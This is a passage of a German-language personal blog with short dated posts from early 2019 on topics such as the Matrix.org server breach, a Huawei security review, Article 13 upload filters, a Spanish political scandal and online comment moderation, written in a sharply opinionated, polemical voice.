Das war auch eine Sache, auf die ich sehr gespannt war: Die Luftqualität. Ich rechnete ja mit dem Schlimmsten nach der Berichterstattung im Westen, und in der Tat kann man hier aus dem Fenster die Skyline im Hintergrund nur durch eine diesige Nebelwand ausmachen. Heute habe ich kurz den Hauch eines Brandgeruches in der Luft festgestellt, aber insgesamt ist das jetzt nicht schlechter als in Hannover oder Berlin. Ich bin allerdings in einer Hafenstadt, das hilft wahrscheinlich.
Der Grund, wieso wir in Europa so verkackte Zahlsysteme haben, liegt übrigens daran, dass die Smartcard-Industrie aus Europa kommt. Die gehen an so ein Problem daher nicht mit "Wie lösen wir das Problem?" ran, sondern mit "Wie können wir hier Smartcards einsetzen?" Klar, kann man so machen. Wird dann halt Mist.
Update: Twitter und Reddit sind auch geblockt. Die BBC geht nicht, aber der Guardian geht. nytimes.com geht nicht, washingtonpost.com geht.
Update: Einige Leser hatten klärende Anmerkungen. Der Maglev ist offenbar tatsächlich der einzige davon und aus Deutschland gekauft :-)
Ich werde mal gucken, ob ich damit eine Fahrt eingeplant kriege. Einige Leser wiesen auch darauf hin, dass der nicht zu jeder Tageszeit gleich schnell fährt. Na mal gucken.
Und zu den E-Rollern: Die lädt man wohl zuhause auf. Der Akku ist rausnehmbar und da gibt es dann ein fettes Netzteil und damit hängt man das an die Steckdose. Manche Roller gehören auch Lieferdiensten und die haben dann eigene Infrastruktur. Aber sowas wie öffentliche Ladesäulen oder so gibt es wohl gar nicht.

Fri Apr 12 2019

[l] Es gab gerade eine spannende Studie dazu, wie der Aufenthalt im All einen Menschen verändert. Dazu haben sie zwei Zwillinge genommen, einer auf der ISS, einer auf der Erde, und haben über eine längere Zeit Messungen gemacht. Ergebnis:
On Thursday, just over three years after Mr. Kelly, 55, returned to Earth, NASA researchers reported that his body experienced a vast number of changes while in orbit. DNA mutated in some of his cells. His immune system produced a host of new signals. His microbiome gained new species of bacteria.
Many of these biological changes seemed harmless, disappearing after he returned to Earth. But others — including genetic mutations and, after his return, declines in cognitive test scores — did not correct themselves, provoking concern among scientists.
Oh Scheiße, das ist ja ein fieser Rückschlag. Welcher Nerd will unter solchen Umständen noch ins All?!
[l] Benutzt hier jemand Matrix (den Crypto-Messenger)?
An attacker gained access to the servers hosting Matrix.org. The intruder had access to the production databases, potentially giving them access to unencrypted message data, password hashes and access tokens. As a precaution, if you're a matrix.org user you should change your password now.
Das war wohl ein netter Hacker, der parallel schön Tickets aufgemacht hat.
Der Bug war nicht in deren Matrix-Code, sondern in deren Drumherum-Scheiß, wo sie einen Jenkins hatten, der per SSH erreichbar war, und da lagen zu allem Überfluss dann auch noch die GPG-Keys herum, mit denen sie ihre Debian-Pakete signieren. Das lässt keine direkten Rückschlüsse auf die Codequalität zu, aber das ist ein weiterer Fall von "Projekt von seiner eigenen Devops-Komplexität erschlagen". Und wenn die da schon so schlampen, dann fragt man sich schon, ob man dem Rest trauen kann. Auf der Kiste, auf der er sich einloggen konnte, war gerade jemand anderes mit SSH Agent Forwarding eingelogt, der Root-Zugriff anderswo hatte. Ganz großes Kino.

Thu Apr 11 2019

[l] Die Bundeswehr scheitert an der Einrichtung verschlüsselter Kommunikationskanäle. Hey, nehmt doch DE-Mail!1!! Das ist, hörte ich, von echten Profis gemacht worden. Ist super sicher! Verschlüsselt auch so gut wie fast beinahe Ende-zu-Ende! Wenn das für Anwaltspost gut genug ist, reicht es ja wohl auch für die Bundeswehr. (Danke, Theo)
[l] Mich ärgert ja gerade dieser ekelhafte Sexismus, mit dem alle diese Physikerin feiern, die das Foto von dem schwarzen Loch gemacht hat. Als ob die sowas wie ein Zirkus-Freak wäre, weil Frauen genetisch weniger geeignet für eine Karriere in der Physik seien! Was ist denn das Bild, das wir damit jungen Mädchen in den Kopf setzen?
Es ist so selten, dass es eine von euch schafft, dass wir das phrenetisch feiern müssen! Probier es lieber gar nicht erst!
Solange ihr da jedesmal drauf herumtrommelt, wenn mal eine Frau irgendwo was schafft, dürft ihr euch nicht wundern, wenn eure Töchter lieber Feminismus oder was mit Medien studieren!
Jungs gegenüber betont man auch nicht, dass fast alle an allem scheitern und am Ende unglückliche Scheißexistenzen haben, sondern man sagt ihnen, dass harte Arbeit im Leben zu guten Dingen führt. Ergebnis? Jungs sind zwar angeblich besser in Mathe, aber ignorieren die schlechte Wahrscheinlichkeit für ihren Erfolg und probieren es wenigstens.
Sich bemühen ist nicht hinreichend aber notwendig. Menschen, die sich nie bemüht haben, haben immer schlechtere Chancen als welche, die sich bemüht haben.
Und hört mir mit dem Role Model Scheiß auf. Das führt zum Gegenteil. Das führt zu "na der/die war halt ein Genie" und schreckt nur ab. Habt ihr alle keine Kinder oder was? Das ist doch Lektion 1 in der Erziehung! Dem Kind nicht sagen, dass es schlau ist, sondern dass sich die Arbeit gelohnt hat. Wenn das Kind dann mal was nicht schafft, ist die Erkenntnis dann nicht "ich bin anscheinend doch eher doof als schlau" sondern "ich habe nicht genug für meinen Erfolg gearbeitet". Meine Güte, das ist doch keine Raketenchirurgie!
Erzählt euren Mädchen dasselbe wie euren Jungs. Harte Arbeit zahlt sich aus. Vorbereitet sein hilft zuverlässig, schlau sein nur wenn man Glück hat. Was für tradierte Bullshit-Lebensmodelle transportiert ihr denn hier bitte?! Du musst nicht hart arbeiten, du kannst ja einen reichen Prinzen heiraten? Hoffen auf Glück statt Investment von Zeit und Aufwand? Diese Forscherin hat nicht am Ende Erfolg gehabt, weil sie Glück hatte. Sie hat Erfolg gehabt, weil sie jahrelang durchgehalten hat. UND weil sie Glück hatte. Glück hat man nicht in der Hand. Vorbereitung und Durchhaltevermögen hat man in der Hand. Trainiert also das.
Update: Einige Leserbriefe kamen dazu rein. Erstmal: Sie ist Informatikerin, nicht Physikerin. Habe ich falsch dargestellt.
Dann haben einige sie verteidigt, sie hätte sich ja gar nicht in den Vordergrund gedrängt. Ist mir gerade nicht klar, wie jemand auf die Idee kommen könnte, dieser Vorwurf stünde im Raum. Ich habe das jedenfalls sicher nicht behauptet. Die Frau hat alles richtig gemacht. Hat sich ein Ziel gesetzt und hart gearbeitet. Genau wie die 200 anderen Mitarbeiter in dem internationalen Team. Ein Leser erklärt:
Zu der Geschichte mit dem schwarzen Loch muss man folgendes anmerken: Es gibt einen Twitter Account in ihrem Namen, auf dem vollmundig erzählt wird das sie ihr Algorithmus das Bild berechnet hätte. Der Account ist aber gar nicht von ihr und es ist unbekannt wer da hinter steckt. Nur sind sehr viele auf den Zug aufgesprungen, sicher auch weil das Bild von ihr, wie sie sich über den Ring auf dem Bildschirm freut, sehr schön die Faszination an der Wissenschaft widergibt.
Von dem wusste ich gar nichts. Ich bezog mich auf die Helden-Titelgeschichten in der normalen Presse.
In Wirklichkeit gibt es mehrere Algorithmen von mehreren Teams, und sie war ein wichtiger Teil von einem Team. Aber es ist in keinster Weise ihr Bild. Sie selber hat das auch nie behauptet. Im Gegenteil betont sie wie alle anderen wie wichtig die Arbeit des gesamten Teams ist.
Siehe z.B. hier: https://twitter.com/SciBry/status/1116367370807848960
Das ganze ist eigentlich ziemlich unangenehm, weil keiner aus dem Team sich in den Vordergrund drängt. Nur leider brauchen die Medien immer ein Gesicht zu einer Meldung.

Wed Apr 10 2019

[l] Infrastrukturapokalypse: In Köln haben zwei Grundschulen zugemacht, weil die Kammerjäger die Rattenplage nicht unter Kontrolle gekriegt haben. (Danke, Holger)

Sat Apr 6 2019

[l] Spanien hat eine schöne Polit-Affäre. Die konservative (natürlich!) Rajoy-Regierung hatte Steuergelder ausgegeben, um den politischen Gegner in Verruf zu bringen.
Wie jetzt bekannt wurde, haben Ministerien dazu Fake News verbreitet und einige Zeitungen haben mitgespielt. Ein Ziel der damaligen Regierung: Linke Parteien sollten auf gar keinen Fall an die Macht kommen.
Schon komisch, dass das immer die "konservativen" sind, die bei solchen unmoralischen Aktionen erwischt werden.
Und wie haben sie das anstellen wollen? Sehr trickreich!
Ein Abgesandter des spanischen Innenministeriums soll einem venezolanischen Ex-Minister Protektion angeboten haben. Im Gegenzug sollte dieser behaupten, Hugo Chavez habe sieben Millionen Euro an Podemos gezahlt. Eine entscheidende Rolle spielten bei den Kampagnen offenbar auch korrupte Beamte der spanischen Polizei.
Na sowas! Korrupte Polizisten? Und die sind dann natürlich im konservativen Teil des politischen Spektrums? Wie ungewohnt!1!!
Aber der Gipfel von der ganzen Nummer ist das hier:
Doch auch wenn das Ganze das Niveau der "Watergate-Affäre" haben sollte - Politologe Simón glaubt nicht, dass es den Konservativen bedeutend schadet. "Es gibt eine große Wählerschicht, die sich vehement gegen Podemos stellt." Die sähe diese Entwicklungen als nicht wirklich schlimm an, sondern als etwas, das gemacht werden musste. "Es ist sehr hart, das zu sagen, aber für die konservative Wählerschicht in Spanien ist das kein Skandal", so Simón.
Na? Erinnert das jemanden an was?

Thu Mar 28 2019

[l] Es gibt einen aktuellen Report zu Huawei. Ab 3.11 wird es relevant. Ich fasse mal zusammen: Sie finden immer wieder Probleme, und das Volumen reißt nicht ab.
Some serious vulnerabilities reported in previous evaluations continue to persist in newer versions.
DAS ist ein Riesenproblem. Nicht nur bei Huawei. Aber das ist eine Sache, die man wirklich kritisieren kann und sollte. Wie eine Firma auf Bugs reagiert, zeigt ihren Charakter viel deutlicher als ob Bugs gefunden werden.
The character of vulnerabilities has not changed significantly between years, with many vulnerabilities being of high impact (equivalently, a high base CVSS score and a relevant operational context), including unprotected stack overflows in publicly accessible protocols
Das ist wirklich übel. Ich wünschte, es wäre nur bei Huawei so krass, ist es aber leider nicht. Das heißt, dass sie ihre Angriffsoberflächen nicht mit Priorität sauberauditiert und gefuzzt haben. Das ist eine Fehlerklasse, die heutzutage wirklich niemand mehr haben sollte. Dass die anderen Marktteilnehmer alle ähnlich grottig sind, ist an dieser Stelle keine Entschuldigung.
Ab 3.19 geht es dann darum, dass Huawei keine reproduzierbaren Builds hat. Das ist bedauerlich, aber leider Industriestandard. Das ändert sich gerade jetzt erst langsam ein bisschen zum Besseren, getrieben vor allem (ironischerweise, finde ich) von so Web-Multimedia-Startup-Klitschen und so Agile-Hipstern mit CI-Pipeline und so, wo das dann zufällig an der Seite mit rausfällt.
Die nächsten Kritikpunkte sind Configuration Management und Third Party Libraries und ihre Versionen, was meiner Erfahrung nach auch alle anderen Playern in der Softwareindustrie große Schwierigkeiten macht.
Bei Punkt 3.31 geht es dann aber ums Eingemachte, und die Kritikpunkte klingen ziemlich deutlich nach "Legacy-Codebasis aus den 90ern, nie aufgeräumt". Was mich ein bisschen irritiert: Das ist kein Hexenwerk, da einmal gezielt drüber zu gehen. Als erstes macht man alle Längen, Indizes, Größen und Offsets size_t, dann schaltet man im Compiler die Signedness-Warnungen an und räumt die alle weg. Dabei werden diverse Stellen kaputtgehen. Wahrscheinlich liegen für die keine Unit Tests vor, die muss man dann halt an der Stelle neu schreiben — und zwar vorher, bevor man den Code ändert. Dann ändert man den Code und guckt, ob die Unit Tests noch bestanden werden. Und wenn man damit fertig ist, geht man alle *printf-Aufrufe durch und guckt nach sprintf mit %s und Format String Vulnerabilities, die so alter Code bestimmt auch einige haben wird.
Nichts davon ist schwarze Magie. Es ist bekannt, wo es hingehen muss, es ist bekannt, in welcher Reihenfolge man welche Schritte durchführen muss, und keiner der Schritte benötigt Kreativität. Das ist eine Menge Aufwand, klar, aber den muss man dann halt machen. Huawei hat ja schon einen Haufen Geld dafür reserviert.
Wenn ich Konkurrent von Huawei wäre, würde ich mir jetzt echt Sorgen machen, dass die einen "Bill Gates Memo"-Stunt pullen, alle Arbeit einstellen und nur Cleanup machen, und dann kann die Konkurrenz mal einpacken, so beschissen wie die Standards bei denen sind.
Was mich noch irritiert: Als Auditor freust du dich über so eine Codebasis! Da musst du nur mal kurz grep anwerfen und schon purzeln dir die Bugs entgegen! Lauter memcpy und sprintf im Code? Da hol ich doch den Schampus raus! In der Zeit, die für das Schreiben dieses Reports draufgegangen ist, hätten sie Dutzende bis Hunderte von Bugs finden müssen, einfach indem sie die einmal alle durchgehen. Dass das da nicht steht, lässt mich vermuten, dass dieser Report eher nicht von Security-Leuten geschrieben wurde, sondern von so Compliance-Halbleichen, die turnusmäßig Berichte über memcpy schreiben, damit niemand voreilig den Bestatter ruft. Sich in so einem Kontext (Pre-Auth Remote Stack Smash) über nicht-reproduzierbare Builds aufzuregen, das ist wie wenn der TÜV dir in den Bericht schreibt, dass dein Lack auf dem Dach etwas auszubleichen beginnt, während das Vorderrad sich gelöst hat und wegrollt. Mag sein, aber ist an der Stelle ganz sicher kein relevantes Problem.

Tue Mar 26 2019

[l] Bayer braucht gar nicht Monsantos Hilfe, um ihr Business mit verlorenen Klagen wegen unethischen Geschäftsgebarens in den Boden zu rammen.
Der Bayer-Konzern zahlt umgerechnet 686 Millionen Euro an US-Amerikanerinnen und -Amerikaner, die ihn wegen seines Blutverdünners Xarelto verklagt haben.
Auf der anderen Seite:
Xarelto ist Bayers umsatzstärkstes Medikament - 2018 hat der Konzern damit einen Umsatz von 3,6 Milliarden Euro gemacht.
(Danke, Wolfram)

Sun Mar 17 2019

[l] In Soviet America, Country punishes International Court of Justice!
Die USA haben ihre Drohung aus dem vergangenen Herbst wahr gemacht und erste Sanktionen gegen den Internationalen Strafgerichtshof (IStGH) in Den Haag verhängt. Hintergrund sind Untersuchungen der Institution, ob US-Soldaten und Mitarbeiter des Geheimdienstes CIA in Afghanistan Kriegsverbrechen begangen haben.
Die direkte Auswirkung ist, dass den mit den Untersuchungen befassten Mitarbeitern ihre Visa entzogen werden sollen und sie nicht mehr in die USA einreisen dürfen.

Wed Mar 13 2019

[l] Lesetipp: Weaponising news: RT, Sputnik and targeted disinformation. Vom King's College London, aber bezahlt von der Open Society Foundation (George Soros). Mir wurde das empfohlen wegen Appendix 3, der ab Seite 129 losgeht, aber auch der Rest lohnt sich auffallend. Ich zitiere mal aus der Executive Summary:
- Flooding the zone: RT, Sputnik and Russian framing of the Skripal incident. This analysis shows how Russian news outlets inserted over 130 competing and often contradictory narratives into their extensive coverage of the March 2018 Salisbury poisoning incident. The study shows how state-linked news outlets operate in a ‘crisis management’ situation, mobilising a ‘parallel commentariat’ to air dozens of narratives explaining events and the motivations of Western actors, as well as amplifying provocative statements from senior Russian government officials.
- Heads we win, tails you lose: projecting Russian strength. This analysis demonstrates how Russian news outlets portray Russian military prowess and Western military weakness to English-speaking audiences. It demonstrates how RT and Sputnik generate a large volume of coverage critical of NATO and extensive reports on the potency of Russian prototype weapons. The susceptibility of Western news outlets to eye-catching details of Russian military strength is demonstrated through evidence of directly and indirectly replicated information on Russian weapons published by UK news outlets.
- Division and dysfunction: how RT and Sputnik portray the West and construct news agendas. The final analysis records how Russian English-language news outlets publish a steady stream of articles about domestic politics and events in the USA and Europe that focus on political dysfunction, institutional failure, social division and the negative effects of immigration. It also shows that RT and Sputnik act as negative news aggregators, harvesting, repackaging and translating stories from local news outlets across Europe, before publishing them for English-language audiences. A software-driven text-matching analysis also demonstrates the extent to which UK news organisations (primarily tabloid news sites) gather and republish content from RT and Sputnik, as well as showing how the Russian outlets replicate content from UK news sources in return.
Über das "Flooding the zone" hatten Frank und ich schon in Alternativlos 36 ein bisschen Gedanken gemacht. Ich möchte an dieser Stelle noch nachtragen, dass es für diese Taktik einen Fachbegriff gibt: Gish Gallop. Benannt nach einem notorischen Kreationisten, der halt schneller Bullshit-Behauptungen aufstellen kann, als man die der Reihe nach widerlegt kriegt.
Appendix 3 ist einfach eine Liste der Narrative, die die Russen über Skripal so verbreitet haben. Ausgesprochen unterhaltsam! (Danke, Detlef)

Tue Mar 12 2019

[l] Wer dachte, die Huawei-Nummer sei durch, und die USA hätten verloren, der hat den Imperialismus der USA unterschätzt:
Die amerikanische Regierung droht Deutschland offenbar mit Einschränkungen bei der Kooperation der Geheimdienste, falls der chinesische Kommunikationsanbieter Huawei bei der Einrichtung des neuen 5G-Datenstandards zum Zuge kommen sollte.
Das soll Trumps freidrehender Botschafter Grenell dem Altmaier so angedroht haben.
Wer sich jetzt denkt, das sei ja vielleicht keine doofe Idee, wenn man dann über das Huawei-Netz keine geheimen Inhalte geschickt sehen will, der sei darauf hingewiesen, dass dem Netz eh niemand traut. Da wird immer noch ein VPN oder TLS oder beides drüber gemacht. Jedenfalls außerhalb der Telekom, die jahrelang VPN ohne Krypto verkauft hat (Begründung: "unsere Netze sind sicher!1!!"). (Danke, Dominic)

Sun Mar 10 2019

[l] Ich bin gerade auf Geschäftsreise in Jerusalem und war am Freitag an der Klagemauer. Es gab da anlässlich des Weltfrauentags eine Auseinandersetzung zwischen Aktivistinnen und ultra-orthoxen Juden. Das habe ich aber verpasst und nichts davon mitgekriegt vor Ort.
Die Position der strenggläubigen Juden ist, dass es Frauen nicht gestattet ist, an der Klagemauer zu beten, schon gar nicht offen und in Gebetskleidung. So sehen das anscheinend auch viele Synagogen hier. Das ist einer der wesentlichen Unterschiede zwischen Christentum und Judentum: Wenn man als Christ unzufrieden damit ist, wie eine Sache gehandhabt wird, dann muss man eine konkurrierende Kirche aufmachen. Im Judentum ist da weniger zentralisiert. Wie das an der Klagemauer ist, hat der örtliche Rabbi entschieden. Da gibt es kein zentrales Dekret, das wird dezentral geklärt.
Es gibt jedenfalls ein paar Aktivistinnen, die den Zustand so nicht länger hinnehmen wollten, und die haben schon vor dieser Aktion Druck gemacht -- und einen Kompromiss gewonnen. Ein Teil der Klagemauer wurde für sie reserviert. Damit sie da beten können, ohne die ultra-orthodoxen zu stören und umgekehrt. Ergebnis: Niemand hat in dem Bereich gebetet. Woraufhin einige verärgerte Männer dann anfingen, da jeden morgen demonstrativ beten zu gehen, sozusagen als Hinweis: Schaut her, hier ist Platz, hier kann man prima beten.
Und die Reaktion der Aktivistinnen war, wie es dann auch in den Nachrichten kam. Sie sind einfach zu dem für die Orthodoxen reservierten Bereich gegangen und haben demonstrativ dort gebetet.
Ich fand sehr interessant, wie verschieden die Perspektiven auf sowas sein können. Meine erste Reaktion war: Wo ist das Problem, lasst die da halt beten. Aber jetzt wo mir jemand die Story mit dem Kompromiss erklärt hat, und meinte, damit hätten sie den Orthodoxen sozusagen bewiesen, dass es ihnen nie um das Beten an der Klagemauer gegangen sei sondern sie bloß Ärger machen wollten, kann ich auch deren Ärger irgendwie nachvollziehen.
Ich als Atheist stelle mir vor, wenn ich beten wollen würde, dass ich es lieber ungestört tun würde als umgeben von anderen Menschen, egal welchen Geschlechtes. Ich war ziemlich erstaunt, dass man mich überhaupt bis an die Klagemauer herangehen ließ, und hielt dann instinktiv Abstand. Oben auf der Klagemauer ist eine Moschee, die zeitgleich zum Gebet rief, während unten die Juden beteten, und dann die Touristenmassen, die sich da vorbeischieben -- für mich ist es ein Wunder, dass sich da überhaupt jemand auf ein Gebet konzentrieren kann.

Wed Mar 6 2019

[l] Und der nächste Auteur, der Berichterstattung und Belletristik nicht auseinanderhalten kann, fliegt auf.
Nachdem das Magazin der Süddeutschen Zeitung den freien Journalisten Dirk Gieselmann vor Veröffentlichung eines Textes dabei überführte, eine Protagonistin erfunden zu haben, hat auch die Zeit Fehler ausfindig gemacht, die gegen "Sorgfaltspflicht und die journalistischen Grundsätze" des Hauses verstoßen und zur Trennung vom Autor führen. Darüber hinaus legt MEEDIA einen weiteren Spiegel-Fall offen, in dem Gieselmann offenbar bewusst unsauber arbeitete – ein gestörtes Verhältnis des Autors zur Wahrheit wird offensichtlich.
Ich finde das ja eine gute Idee, Autoren mit gestörtem Verhältnis zur Wahrheit rauszuschmeißen. Wann die Medien wohl damit anfangen? (Danke, Peter)

Tue Mar 5 2019

[l] Wisst ihr noch, als ich mich darüber lustig gemacht habe, wie in den USA skrupellose Wahlmanipulatoren den Leuten den falschen Wahltermin gesagt haben, damit sie die richtige Wahl verpassen?
Stellt sich raus: Die CDU will die Abstimmung über Artikel-13-Uploadfilter vorziehen, um die demokratischen Proteste auszuschalten.
Keine Taktik ist zu schäbig für die CDU. Früher habe ich die hier immer als Schwarze Pest bezeichnet. Das sollte ich vielleicht wieder so machen.

Mon Mar 4 2019

[l] Wer schonmal x86-Assembler programmiert hat, kennt die String-Instruktionen, z.B. repe cmpsb für memcmp. Der nimmt die Register si, di und cx und vergleicht byteweise (heutzutage natürlich esi, edi und ecx oder gleich rsi, rdi und rcx). Allerdings hatte ich das damals so gelernt, dass man darauf achten muss, dass cx nicht schon als 0 reinkommt, weil die Abbruchbedingung bei scas und cmps nach dem Laden der Werte, dem Vergleich und dem cx-Runterzählen gemacht wird. Stellt sich raus: Das stimmt gar nicht.
Ich schleppe in der dietlibc seit Jahrzehnten in memcpy ein überflüssiges jecxz mit!
Immer wieder krass, wie man Dinge einfach jahrzehntelang unhinterfragt für wahr halten kann, die man auch einfach mal kurz hätte testen können.

Fri Mar 1 2019

[l] Die CDU liefert sich mit ihrem Artikel-13-Verkacken gerade ein Rennen mit Trump/Cohen, habe ich den Eindruck. Cohen hat, wenn ihr das nicht gesehen hattet, vor dem Congress ausgesagt. U.a. erzählte er, dass er in Trumps Auftrag seine ehemaligen Schule und Uni mit Klage bedroht hat, falls seine SAT-Scores (sowas wie Schulnoten in einem landesweit standardisierten Abschlusstest) bekannt würden, während er sich öffentlich als Genie feierte.
Und die CDU? Nach dieser Glanzleistung haben sie endlich einen Kronzeugen gefunden, der Artikel 13 gut findet. Und was macht der so? Nun, er sitzt im Aufsichtsrat der GEMA. Die GEMA führt ja schon seit Jahrzehnten einen Krieg gegen das Internet und Youtube und ist auch die letzte noch stehende Lobbyorganisation hinter Artikel 13, soweit ich weiß.
Aber man soll ja nicht die Person sondern die Inhalte bewerten. Daher lest euch mal den Inhalt durch. Immerhin ist der Herr Meuser besser informiert als CDU-"Kompetenzträger" wie Axel Voss und co, denn er hat verstanden, dass Uploadfilter keine Satire erkennen können.

Tue Feb 26 2019

[l] Update zu den verlorenen Beweismitteln: Schon im Frühjahr 2018 hatte eine Mutter Anzeige erstattet.
Ein Dauercamper habe ihre Tochter bei einem Grillabend auf dem Campingplatz im April 2018 vergewaltigt, sagte die Frau Polizisten in Detmold. Der Mann soll das Mädchen betrunken gemacht und sich dann an der wehrlosen Jugendlichen vergangen haben.
Und was passierte dann?
Ihr müsst jetzt sehr tapfer sein:
Die Ermittlungen sind damals jedoch eingestellt worden.
Und da wundert sich die Justiz, dass sie einen schlechten Ruf hat. Für Copyright-Massenabmahner hat man Ressourcen, für Vergewaltigungen auf Campingplätzen nicht. Ja super.

Mon Feb 25 2019

[l] Kennt ihr das? Ihr hattet es euch gerade so richtig bequem gemacht in der Opfer-Ecke, und dann kommt so ein fieser evidenzbasierter Alt-Right-Vollnazi und zweifelt an, dass ihr wirklich benachteiligt werdet? Skandalös! Was macht man da? Sagen wir mal, man ist ein bekannter Schauspieler mit gut laufender Karriere? Wie weist man da Benachteiligung nach, wenn 100m weiter ein obdachloser Ex-Knacki mit HIV in der Gosse liegt? Na klar! Man fingiert ein Hate Crime gegen sich!
Ach komm, Fefe, das ist doch ein völlig unrepräsentativer Einzelfall! Sowas würde sonst nie jemand machen! Gut, außer diesem LGBT-Aktivisten, der sein eigenes Haus anzündet. Mit fünf Haustieren noch drin im brennenden Haus.
Auf der anderen Seite gibt es ja auch Leute, die so tun, als hätten sie Krebs, weil sie Mitgefühl haben wollten. Und wenn es falsche Vergewaltigungs-Vorwürfe gibt, wieso sollte es dann nicht auch falsche Hate-Crime-Vorwürfe geben.
Aber dass jemand echt sein eigenes Haus anzündet, das schockiert mich ja jetzt doch. What the FUCK?

Sat Feb 23 2019

[l] Wenn ihr diese Woche einen Artikel lest, lest diesen hier. Vom wie immer großartigen Slate Star Codex, aber diesmal in eigener Sache. Und zwar hat jemand zu seinem Blog einen Subreddit aufgemacht, und dort haben sie einen Thread zum "Culture War" aufgemacht, mit sechs Moderatoren und ihm als Moderator ehrenhalber. Die Idee war, die ganzen kontroversen Themen in diesen Thread zu verbannen, damit in den anderen Threads normal diskutiert werden kann. Und das hat gut funktioniert.
Er sieht sich in der Tradition aller Zeitungen, die ihre Foren zugemacht haben, nur dass er sich die Zeit nimmt, da drüber nachzudenken und offen drüber zu reden.
The fact is, it’s very easy to moderate comment sections. It’s very easy to remove spam, bots, racial slurs, low-effort trolls, and abuse. I do it single-handedly on this blog’s 2000+ weekly comments. r/slatestarcodex’s volunteer team of six moderators did it every day on the CW Thread, and you can scroll through week after week of multiple-thousand-post culture war thread and see how thorough a job they did.
But once you remove all those things, you’re left with people honestly and civilly arguing for their opinions. And that’s the scariest thing of all.
Some people think society should tolerate pedophilia, are obsessed with this, and can rattle off a laundry list of studies that they say justify their opinion. Some people think police officers are enforcers of oppression and this makes them valid targets for violence. Some people think immigrants are destroying the cultural cohesion necessary for a free and prosperous country. Some people think transwomen are a tool of the patriarchy trying to appropriate female spaces. Some people think Charles Murray and The Bell Curve were right about everything. Some people think Islam represents an existential threat to the West. Some people think women are biologically less likely to be good at or interested in technology. Some people think men are biologically more violent and dangerous to children. Some people just really worry a lot about the Freemasons.
[…]
The thing about an online comment section is that the guy who really likes pedophilia is going to start posting on every thread about sexual minorities “I’m glad those sexual minorities have their rights! Now it’s time to start arguing for pedophile rights!” followed by a ten thousand word manifesto. This person won’t use any racial slurs, won’t be a bot, and can probably reach the same standards of politeness and reasonable-soundingness as anyone else. Any fair moderation policy won’t provide the moderator with any excuse to delete him. But it will be very embarrassing for to New York Times to have anybody who visits their website see pro-pedophilia manifestos a bunch of the time.
Alleine für diese Absätze hat sich für mich die Lektüre schon gelohnt. Aber es geht natürlich mit dem Twitter-Müllschacht weiter.
Every Twitter influencer who wants to profit off of outrage culture is going to be posting 24-7 about how the New York Times endorses pedophilia. Breitbart or some other group that doesn’t like the Times for some reason will publish article after article on New York Times‘ secret pro-pedophile agenda. Allowing any aspect of your brand to come anywhere near something unpopular and taboo is like a giant Christmas present for people who hate you, people who hate everybody and will take whatever targets of opportunity present themselves, and a thousand self-appointed moral crusaders and protectors of the public virtue. It doesn’t matter if taboo material makes up 1% of your comment section; it will inevitably make up 100% of what people hear about your comment section and then of what people think is in your comment section. Finally, it will make up 100% of what people associate with you and your brand. The Chinese Robber Fallacy is a harsh master; all you need is a tiny number of cringeworthy comments, and your political enemies, power-hungry opportunists, and 4channers just in it for the lulz can convince everyone that your entire brand is about being pro-pedophile, catering to the pedophilia demographic, and providing a platform for pedophile supporters. And if you ban the pedophiles, they’ll do the same thing for the next-most-offensive opinion in your comments, and then the next-most-offensive, until you’ve censored everything except “Our benevolent leadership really is doing a great job today, aren’t they?” and the comment section becomes a mockery of its original goal.
In diesem Sinne: Respekt für alle, die noch eine Kommentarsektion haben. Und die nicht an Disqus oder so outgesourced haben.
Ich würde echt am liebsten den ganzen Artikel hier zitieren, so wichtig ist mir das. Leute haben ihn zu doxxen angefangen, haben einen Smear-Subreddit aufgemacht, um ihn und seine Arbeit zu diskreditieren, haben nach Threads über ihn oder seine Arbeit gesucht, und sind dann da aufgetaucht, um eine out-of-context-Sammlung angeblich böser Dinge zu posten, die er gesagt oder geduldet haben soll.
Some people found my real name and started posting it on Twitter. Some people made entire accounts devoted to doxxing me in Twitter discussions whenever an opportunity came up. A few people just messaged me letting me know they knew my real name and reminding me that they could do this if they wanted to.
Some people started messaging my real-life friends, telling them to stop being friends with me because I supported racists and sexists and Nazis. Somebody posted a monetary reward for information that could be used to discredit me.
One person called the clinic where I worked, pretended to be a patient, and tried to get me fired.
Es ist echt eine Riesenschande, was da passiert ist. Wer Slatestarcodex häufiger liest (ich linke da immer wieder drauf), und sich ein Bild von den Artikeln da gemacht hat, der wird mir sicher zustimmen, dass die Vorwürfe gegen den Typen absolut grotesk sind. Es ist auch eine Schande, dass unsere Community der Pareto-Distribution unterliegt, und die Last und das Risiko nur auf einigen wenigen Schultern ruht. Die meisten sind nur passive Konsumenten und kriegen gar nicht mit, wenn solche Aktionen laufen, oder denken sich, es ist nicht ihr Problem oder es wird schon nicht so schlimm sein.

Fri Feb 22 2019

[l] Die GEMA erklärt kurz Künstliche Intelligenz.
Immer wieder beeindruckend, so viel Unkenntnis auf einem Haufen. Und dann aber der gerechte Zorn und die Selbstsicherheit, mit dem das als die offensichtliche Wahrheit vorgetragen wird.
Nicht einmal Menschen können sicher Parodie und Satire erkennen. Aber klar, KI kann es. Sobald wir KI fertig erfunden haben. Kann sich nur noch um wenige Jahrzehnte handeln.
Ich bin mir sicher, dass die KI diesen Tweet sofort als Satire erkennen würde. Das ist ja auch eines der klareren Beispiele für Satire. Das ist schon ein Gebot der Höflichkeit. Es wäre unhöflich, jemandem so einen krassen Fall von Blödheit zu unterstellen, wenn man auch Satire annehmen kann.

Thu Feb 21 2019

[l] Zum Berliner Stromausfall kamen hier einige interessante Leserbriefe rein:
Ein Bekannter von mir, Polier bei einem großen Bauunternehmen, hat vor einiger Zeit über ein mittelgroßes Bauvorhaben in der Stadt aus dem Nähkästchen geplaudert. Bei dem Projekt gab es eine Bauverzögerung von einem halben Jahr, in der Zeitung wurde damals kein Grund zu den Verzögerungen genannt. Wie er dann erzählt hat, wurden dort bei Tiefbauarbeiten zwei 100kV Leitungen entdeckt, die nirgendwo in den Bauplänen verzeichnet waren und für die sich auch niemand zuständig gefühlt hat, aber unter Strom waren. Das hat sich über mehrere Monate gezogen in denen die Arbeiten an der Baustelle größtenteils stillstanden. Es wurde dann zwar irgendwie rausgefunden wo und wie die Dinger verkabelt sind, zuständig hat sich trotzdem niemand für gefühlt. Ende vom Lied war dann, dass sich das Bauunternehmen um die Verlegung gekümmert hat.
Der zweite Leserbrief haut in dieselbe Kerbe:
